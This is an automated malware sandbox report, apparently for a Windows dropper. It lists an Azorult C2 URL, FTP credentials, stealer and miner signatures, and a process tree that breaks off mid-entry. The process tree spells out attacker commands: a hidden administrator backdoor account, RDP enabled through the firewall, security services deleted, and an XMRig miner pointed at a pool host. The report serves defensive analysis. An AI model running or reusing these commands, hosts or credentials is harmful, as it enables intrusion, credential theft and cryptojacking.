Resubmissions

19-01-2021 19:24

210119-s26yznnqsn 10

19-11-2020 13:14

201119-s41ec6lt86 10

Analysis

  • max time kernel
    1804s
  • max time network
    1816s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-11-2020 13:14

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.81
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 20 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Registers new Print Monitor 2 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 9 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Views/modifies file attributes 1 TTPs 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:1192
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:2912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:2060
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:1428
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2204
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:3628
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:504
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:696
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:3712
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:3796
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:2372
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:2780
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:2012
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:428
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:2872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:3920
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:1268
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:3452
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:2196
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:1696
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:1296
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:1732
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:3176
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:200
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:4616
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:4660
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4776
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4848
          • C:\ProgramData\WindowsTask\audiodg.exe
            C:\ProgramData\WindowsTask\audiodg.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:2428
          • C:\ProgramData\WindowsTask\MicrosoftHost.exe
            C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:5208
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:2164
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            PID:204
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:1744
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:744
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            Modifies file permissions
            PID:3924
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:360
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:208
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:1256
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:1288
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:2016
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:3968
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:4312
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:4332
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:4500
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4552
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:5048
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:2640
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:4192
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:4208
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:1408
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:4352
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:4424
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:4524
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:4540
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4600
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4680
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:4620
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:4740
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4672
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:3768
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4836
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4772
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4792
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:2340
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4952
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:4908
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4988
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:5100
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:4112
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:5116
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:4132
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    PID:4224
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:4788
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:4480
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:4704
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:4624
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:5016
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:4196
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:4240
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:812
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:5064
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:1760
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:4100
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:4120
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:4164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:4184
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:4228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:4248
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:4292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:4360
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:4460
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:4372
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:4472
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:4532
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:4596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:4668
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:4724
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:4744
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:4828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:4896
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:4940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:4960
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:5012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:4108
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:4156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:3776
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:1048
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4464
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:4392
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:4536
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:4636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:4920
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:5004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4180
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:4264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:4384
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:4344
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4400
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:4276
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4676
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:4512
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:4572
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:4736
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:4588
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:4992
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:5092
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:2388
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:3820
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4316
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4152
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4592
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4644
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4428
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4456
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:724
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:4784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4980
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:2408
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:5104
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:768
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4300
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:4604
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:4696
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:5080
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:4756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:5036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:4204
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:992
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:4432
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:196
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:5044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4860
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:5088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:4488
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:5084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:4856
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4760
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:4976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:4996
          • C:\Windows\SysWOW64\netsh.exe
